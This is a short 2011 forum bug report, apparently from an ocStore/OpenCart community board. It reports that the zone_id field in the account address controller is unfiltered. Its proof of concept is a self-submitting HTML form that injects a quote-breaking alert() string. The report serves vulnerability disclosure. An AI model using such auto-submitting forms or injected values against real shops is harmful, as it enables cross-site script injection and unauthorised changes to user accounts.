Фильтрация zone_id

Автор: LTRay,
24 липня 2011 в Отчёты об ошибках

Передплатники 0

Recommended Posts

LTRay

Опубліковано: 24 липня 2011

- Share

Опубліковано: 24 липня 2011

В ./catalog/controller/account/address.php нету фильтрации/приведения типа к int

Не xss так как post запрос, но всё равно как то не хорошо

Срабатывание при открытии

ocStore 1.0.1RC2

Пример формы

<body onload="document.main.submit()">
<form name="main" method="post" action="http://localhost/index.php?route=account/address/update&address_id=1">
<input type="hidden" name="zone_id" value="123');alert('a" />
</form>
</body>

Надіслати

Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз

Передплатники 0

Перейти до списку тем

Зараз на сторінці 0 користувачів
- Ні користувачів, які переглядиють цю сторінку

Покупцям

Розробникам

Корисна інформація

Останні розширення

Залежність між опціями товарів, створення конструктора Автор: xirurg303
Double Categories Автор: Sha
SP Auto Change Customer Group Автор: spectre
Пошук замовлень за діапазоном дат Автор: PaulKravchenko
Пошук замовлень за телефоном та email Автор: PaulKravchenko

Вхід

Фильтрация zone_id

Recommended Posts

LTRay

Надіслати

Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Створити обліковий запис

Вхід

Зараз на сторінці 0 користувачів

Покупцям

Розробникам

Корисна інформація

Останні розширення

Ваші замовлення

ocStore

Шаблони

OpenCart.Pro

Important Information